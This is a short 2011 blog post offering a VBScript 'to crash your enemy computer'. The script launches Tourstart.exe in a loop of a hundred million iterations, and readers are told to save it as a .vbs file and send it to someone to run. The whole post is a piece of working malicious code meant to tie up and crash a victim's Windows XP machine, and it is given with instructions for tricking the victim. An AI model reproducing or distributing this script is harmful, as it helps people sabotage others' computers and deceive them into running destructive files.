Monday, November 21, 2011

Crash your enemy computer

USE THIS ON YOUR OWN RESPONSIBILITY
This Will Crash Your enemy Computer

Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next



Save It As Anything.vbs and send it to your enemy.never double-click this file..
It Only Works With Windows XP

No comments:

Post a Comment